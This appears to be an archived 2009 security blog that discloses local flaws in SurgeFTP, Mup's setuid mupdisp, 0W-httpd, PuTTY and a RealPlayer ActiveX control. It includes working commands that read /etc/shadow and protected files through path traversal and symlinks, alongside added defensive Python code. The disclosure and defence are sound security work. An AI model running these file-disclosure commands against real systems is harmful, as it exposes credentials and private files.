Friday, June 5, 2009

Breaking Out in SurgeFTP

There is a funny bug in SurgeFTP that allows users to break out of their home directory.

SurgeFTP will follow symbolic links, so exploiting this is as easy as being able to create links to directories of your choosing.
rush@ubuntu:~$ ftp example
Connected to example.
220 SurgeFTP example (Version 2.3a6)
Name (example:rush): test
331 Password required for test.
Password:
230- Alias Real path Access
230- / /home/test read+write
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw------- 1 test test 75 Jun 4 22:09 .bash_history
-rw-r--r-- 1 test test 220 Jun 4 22:07 .bash_logout
-rw-r--r-- 1 test test 3115 Jun 4 22:07 .bashrc
-rw-r--r-- 1 test test 675 Jun 4 22:07 .profile
lrwxrwxrwx 1 test test 4096 Jun 4 22:09 fs -> /
226 Transfer complete.
ftp> cd fs
250 CWD command successful now (/fs)
ftp> pwd
257 "/fs" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /fs
drwxr-xr-x 2 root root 4096 May 15 0:10 bin
drwxr-xr-x 3 root root 4096 May 15 13:34 boot
lrwxrwxrwx 1 root root 4096 Apr 28 12:02 cdrom -> media/cdrom
drwxr-xr-x 3 root root 4096 May 22 14:32 debian
drwxr-xr-x 15 root root 3800 Jun 4 13:11 dev
drwxr-xr-x 160 root root 12288 Jun 4 22:07 etc
drwxr-xr-x 6 root root 4096 Jun 4 22:07 home
lrwxrwxrwx 1 root root 7534504 May 15 0:25 initrd.img -> boot/initrd.img-2.6.28-11-generic
lrwxrwxrwx 1 root root 8220906 Apr 28 12:34 initrd.img.old -> boot/initrd.img-2.6.27-7-generic
drwxr-xr-x 20 root root 12288 May 22 14:18 lib
drwx------ 2 root root 16384 Apr 28 12:01 lost+found
drwxr-xr-x 3 root root 4096 Oct 29 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 3 root root 4096 May 29 1:18 opt
dr-xr-xr-x 153 root root 0 Jun 4 13:09 proc
drwxr-xr-x 13 root root 4096 May 22 16:43 root
drwxr-xr-x 2 root root 4096 May 15 20:09 sbin
drwxr-xr-x 2 root root 4096 Mar 6 11:21 selinux
drwxr-xr-x 2 root root 4096 Oct 29 2008 srv
drwxr-xr-x 12 root root 0 Jun 4 13:09 sys
drwxrwxrwt 17 root root 20480 Jun 4 21:50 tmp
drwxr-xr-x 12 root root 4096 May 22 14:18 usr
drwxr-xr-x 16 root root 4096 May 22 14:10 var
lrwxrwxrwx 1 root root 3501776 May 15 0:25 vmlinuz -> boot/vmlinuz-2.6.28-11-generic
lrwxrwxrwx 1 root root 2244272 Apr 28 12:34 vmlinuz.old -> boot/vmlinuz-2.6.27-7-generic
226 Transfer complete.
ftp> cd /
250 CWD command successful now (/)
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw------- 1 test test 75 Jun 4 22:09 .bash_history
-rw-r--r-- 1 test test 220 Jun 4 22:07 .bash_logout
-rw-r--r-- 1 test test 3115 Jun 4 22:07 .bashrc
-rw-r--r-- 1 test test 675 Jun 4 22:07 .profile
lrwxrwxrwx 1 test test 4096 Jun 4 22:09 fs -> /
226 Transfer complete.
ftp> bye
221 Closing connection - goodbye!
rush@ubuntu:~$

Since the user would have to be able to create the links in the first place (probably using a shell), the risk is low in most circumstances.
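The check SurgeFTP was missing, as an added example that is not part of the original post or of SurgeFTP's own code: a virtual path requested by the client is resolved through every symlink and ".." onto the real filesystem, and anything that ends up outside the user's real home is refused. A second helper is the audit an administrator would run over existing home directories, listing symlinks whose target escapes. The directory layout in demo() is constructed to mirror the session above (a dotfile, a normal subdirectory, and fs -> /).

```python
import os
import tempfile
from typing import List, Optional


def resolve_within_root(root: str, requested: str) -> Optional[str]:
    """Map a client-supplied virtual path (e.g. "/fs/etc") onto the real
    filesystem and return it only if, after following every symlink and
    "..", it still lies inside `root`. Returns None for an escape."""
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, requested.lstrip("/")))
    # commonpath rather than startswith: /home/test must not accept /home/test2
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


def find_escaping_symlinks(root: str) -> List[str]:
    """Audit helper: list every symlink under `root` (as a relative path)
    whose target resolves outside it. followlinks=False so the walk itself
    never wanders out through such a link."""
    real_root = os.path.realpath(root)
    escapes = []
    for dirpath, dirnames, filenames in os.walk(real_root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([real_root, target]) != real_root:
                    escapes.append(os.path.relpath(full, real_root))
    return sorted(escapes)


def demo() -> dict:
    """Constructed home directory: a dotfile, a normal subdirectory and the
    symlink fs -> / from the session above."""
    with tempfile.TemporaryDirectory() as home:
        open(os.path.join(home, ".profile"), "w").close()
        os.mkdir(os.path.join(home, "docs"))
        os.symlink("/", os.path.join(home, "fs"))
        return {
            "profile_allowed": resolve_within_root(home, "/.profile") is not None,
            "docs_allowed": resolve_within_root(home, "/docs") is not None,
            "fs_blocked": resolve_within_root(home, "/fs/etc") is None,
            "dotdot_blocked": resolve_within_root(home, "/../") is None,
            "escapes": find_escaping_symlinks(home),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The important detail is that the comparison happens on the realpath, after the symlink has been followed; comparing the textual "/fs" against "/" (which is what a server that only tracks the virtual path effectively does) is what lets the escape through.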

Vendor Response:
Thanks for reporting this, here is a new build
http://netwinsite.com/ftp/misc/surgeftp_23a10_linux.tar.gz

This has a new setting
global_nosymlink "true"
which you can turn on to disable this behaviour.
Much better than nothing :)

Tuesday, May 26, 2009

Mup Local Arbitrary File Disclosure

"Mup is a shareware program for printing music."

% grep -B1 4755 mup-5.6/makefile
# For Linux console mode support, uncomment the following line
# chown root $(BINDIR)/mupdisp ; chmod 4755 $(BINDIR)/mupdisp
% ls -al /usr/bin/mupdisp
-rwsr-xr-x 1 root root 815245 2009-05-26 15:57 /usr/bin/mupdisp
% /usr/bin/mupdisp /etc/shadow
Mupdisp - Version 5.6
Mup - Music Publisher Version 5.6
Copyright (c) 1995-2009 by Arkkra Enterprises.
All rights reserved.

/etc/shadow: line 1:
root:$1$k.XXXXXXXXXXXXXXXXXXXXXXXXXX:14360:0:99999:7:::
.....
stopping due to previous errors
%

Reading the first line of the grep output tells us that mupdisp...

--> "mupdisp runs Mup and then runs GhostScript on the result."

will be SUID root if the user enables "Linux console mode support".

Vendor Response:
"The tgz version already does not use setuid, so there should be no issue
for people installing from that, unless they explicitly choose to change
the mode. The same is true for anyone compiling for themselves.
We will change the rpm spec file to not do setuid. We can also suggest
using sudo rather than setuid, which is a better alternative that was
not available yet at the time mupdisp was originally written."
This came after explaining that a workaround != fix. Oh dear.

Sunday, May 17, 2009

Leet Trip Odometer

I stopped to check the mail and barely got a snapshot of this.. haha

In case you're blind, my trip odometer reads "1337" (it was turning to 1338, I tried to stop as fast as I could)! How cool is that? :D

Thursday, May 14, 2009

SQL Injection is Dangerous

Apparently.. because attackers used a SQL injection flaw in the administration panel at domainz.net to deface the highest of high profile .nz and .pr websites. Zone-H has got the full story.

Google and Gmail, Microsoft, MSN, MSDN, and Hotmail, Sony, Dell, and even Paypal weren't spared.

I'm not a fan of defacements but this is shocking. Even though they got lucky and exploited the administration panel, which is far from a leet hack.. well, this still isn't too bad. It's not like they broke the servers themselves, but they changed the DNS records. There is a certain beauty in carefully crafted code, spawning a shell and breaking root.. but, yeah, easy works too.

It's been that time for a while for us to think outside the box any way we can. Hacking is delicious.

Thursday, May 7, 2009

Go Go GrabIt!

After seeing this advisory for my favorite win32 newsgroup software, I had to check it out. Before I had time to write a proper exploit, however, someone, as usual, had posted a low quality one soon thereafter. Right... Well, mine should win any race with the first near-proof-of-concept anyway.

milw0rm was kind enough to host it for me -> here

I was poking around some ports on my freebsd box and found a privileged partial read via the configuration file flag in 0W-httpd (ZeroWait httpd).. too bad it's only suid+sgid www.

[root@freebsd /tmp]# ls -al /usr/local/sbin/0W-httpd
-rwsr-sr-x 1 www www 111100 May 5 15:50 /usr/local/sbin/0W-httpd
[root@freebsd /tmp]# echo "www's-eyes-only" > secret
[root@freebsd /tmp]# chown www:www /tmp/secret
[root@freebsd /tmp]# chmod 700 /tmp/secret
[root@freebsd /tmp]# exit
exit
[rush@freebsd ~]$ cat /tmp/secret
cat: /tmp/secret: Permission denied
[rush@freebsd ~]$ /usr/local/sbin/0W-httpd -f -c ../../../../tmp/secret
16:00:54|httpd| cannot create directory logs/2009-05-05: No such file or directory
16:00:54|httpd| cannot create directory logs/2009-05-05: No such file or directory
16:00:54|httpd| 53677 is starting to work
16:00:54|httpd| unknown option `www's-eyes-only'
16:00:54|httpd| config error at www's-eyes-only (/usr/local/etc/0W-httpd//../../../../tmp/secret:1)
16:00:54|httpd| 53677 is exited due to some init error
[rush@freebsd ~]$
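Both the mupdisp and the 0W-httpd reads above have the same shape: a setuid program opens a file named by the invoking user with the owner's privileges, then copies the offending line into a diagnostic. The following is an added example, not code from either project, showing the two fixes a maintainer would apply: drop privileges permanently (group first, then user, then confirm the drop stuck) before opening anything the caller named, and report a parse error by position rather than by content. KNOWN_OPTIONS and the config file contents are constructed for the demo; the option names are not those of either program.

```python
import os
import tempfile


def drop_privileges() -> tuple:
    """Permanently give up any setuid/setgid bit before touching user input.
    Supplementary groups can only be shed while still root; the gid must be
    set before the uid (after setuid() we could no longer change it); and a
    successful setuid(0) afterwards would mean the drop did not stick."""
    real_uid, real_gid = os.getuid(), os.getgid()
    if os.geteuid() == 0:
        os.setgroups([])
    os.setgid(real_gid)
    os.setuid(real_uid)
    if real_uid != 0:
        try:
            os.setuid(0)
        except PermissionError:
            pass
        else:
            raise RuntimeError("privilege drop did not stick")
    return os.geteuid(), os.getegid()


def config_error_unsafe(path: str, lineno: int, line: str) -> str:
    """The pattern seen in both programs: the offending line, i.e. file
    content that was read with elevated rights, is echoed to the caller."""
    return f"unknown option `{line}' ({path}:{lineno})"


def config_error_safe(path: str, lineno: int, line: str) -> str:
    """Report the position only; the content never reaches the caller."""
    return f"config error at {path}:{lineno} (option not recognised)"


KNOWN_OPTIONS = {"port", "docroot", "logdir"}  # constructed for the demo


def parse_config(path: str, echo_content: bool = False) -> dict:
    """Parse 'key value' lines as the invoking user, not as the file owner.
    Returns the parsed options and a list of diagnostic strings."""
    drop_privileges()
    options, errors = {}, []
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, raw in enumerate(fh, 1):
                line = raw.strip()
                if not line or line.startswith("#"):
                    continue
                key, _, value = line.partition(" ")
                if key not in KNOWN_OPTIONS:
                    fmt = config_error_unsafe if echo_content else config_error_safe
                    errors.append(fmt(path, lineno, line))
                    continue
                options[key] = value
    except OSError as exc:
        # A file the real user may not read now fails here with EACCES,
        # which is the correct outcome for /etc/shadow or /tmp/secret.
        errors.append(f"{path}: {exc.strerror}")
    return {"options": options, "errors": errors}


def demo() -> dict:
    """Constructed config with one secret-looking line, parsed both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write("port 8080\nwww's-eyes-only\n# comment\ndocroot /srv/www\n")
        path = fh.name
    try:
        return {
            "unsafe": parse_config(path, echo_content=True),
            "safe": parse_config(path),
            "dropped": drop_privileges() == (os.getuid(), os.getgid()),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, result in demo().items():
        print(mode, result)
```

Run as an ordinary user the privilege drop is a no-op and both parses succeed, which is what makes the difference between the two diagnostics visible: only the unsafe one contains the line itself. Installed setuid, the open() in parse_config would fail with "Permission denied" for any file the caller cannot read, exactly as cat did in the session above.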

Sunday, April 26, 2009

Practical Insecurity

A thousand words, indeed.

I also discovered something funny about PuTTY.. you could trick a local user into launching another executable if they choose to duplicate their session.

A scenario would go something like this (e.g. putty.exe sitting on the Desktop):

* Target launches PuTTY and opens a session.

* Some time later an attacker manages to move putty.exe somewhere off the Desktop (while the session is open) and replaces it with ANOTHER executable, named putty.exe.

* Target comes back and decides they need a duplicate session ("Duplicate Session" on the menu). But instead of a duplicate session, the attacker's executable is launched, and we all know how that works...
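The defensive counterpart to that scenario, as an added example that is neither PuTTY code nor from the original post: a program that re-launches its own image by path can pin a digest of that file when it starts and refuse the relaunch if the file at the path no longer matches. PinnedLauncher, the file names and the fake image bytes are all constructed for the demo. The check narrows the window rather than closing it (the file could still change between verify() and the spawn), so it complements, rather than replaces, keeping the executable somewhere the user alone can write.

```python
import hashlib
import os
import tempfile
from typing import List, Optional


class PinnedLauncher:
    """Remember a SHA-256 of an executable at the moment it was trusted and
    only hand back a launch command while the file still matches."""

    def __init__(self, path: str):
        self.path = path
        self.pinned = self._digest(path)

    @staticmethod
    def _digest(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def verify(self) -> bool:
        """False if the file changed, was removed, or became unreadable."""
        try:
            return self._digest(self.path) == self.pinned
        except OSError:
            return False

    def relaunch_command(self, args: Optional[List[str]] = None) -> Optional[List[str]]:
        """argv for a duplicate session, or None when the image is not the one
        that was pinned; the caller should then refuse and tell the user."""
        if not self.verify():
            return None
        return [self.path] + list(args or [])


def demo() -> dict:
    """Walk through the scenario above with constructed files."""
    with tempfile.TemporaryDirectory() as desktop:
        exe = os.path.join(desktop, "putty.exe")
        with open(exe, "wb") as fh:
            fh.write(b"MZ original image (constructed)")
        launcher = PinnedLauncher(exe)          # session opened, image pinned
        first = launcher.relaunch_command(["-load", "mysession"])

        # The swap from the scenario: the original is moved aside and a
        # different file appears under the same name.
        os.replace(exe, os.path.join(desktop, "putty.exe.moved"))
        with open(exe, "wb") as fh:
            fh.write(b"MZ something else entirely (constructed)")
        second = launcher.relaunch_command(["-load", "mysession"])

        os.unlink(exe)                          # file gone: also refused
        third = launcher.relaunch_command()

        return {"first": first, "second": second, "third": third}


if __name__ == "__main__":
    print(demo())
```

A digest is used rather than a size or timestamp because both of those are trivial to preserve on the replacement; on Windows the natural stronger check is to verify the file's Authenticode signature before spawning it, which the same verify() hook could call instead.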

Probably not very useful for much of anyone.. just something funny about PuTTY's functionality.

I'm excited to announce the release of Hzzp for Monday, April 27th 2009. After countless hours of bug hunting, this valuable fuzzing tool has served its purpose well. After a near rewrite and restructuring of Hzzp, it's ready for public release at Krakow Labs tomorrow.

Happy Fuzzing :)

Saturday, March 28, 2009

Pop-up Blockers VS Realplayer

I guess these days are different from those in which pop-up blockers were still relevant. Because of the built-in protection most major web browsers offer, the era of those beastly applications has declined, if not been forgotten.

Bug hunting in ActiveX controls has left the field nearly extinct for most software, but not all of course. Not that I'm saying there aren't any more bugs out there, but there are far fewer than ever before. An interesting "issue" (not much in the way of security issue) is in Realplayer's ierpplug.dll. The control associated with ierpplug.dll (FDC7A535-4070-4B92-A0EA-D9994BCC0DC5) contains a method called "OpenURLInPlayerBrowser". As you might have figured, we can open any URL in Realplayer using this function.

Now, not that any Pop-up blockers were designed to deal with this, because I doubt they were or they would have, but we can bypass them and get Realplayer to open URLs for us. That means most websites that IE will open (Realplayer basically uses IE), Realplayer can open as well.

It's as easy as...

activex.OpenURLInPlayerBrowser url

Nothing special, it just may come in handy sometime.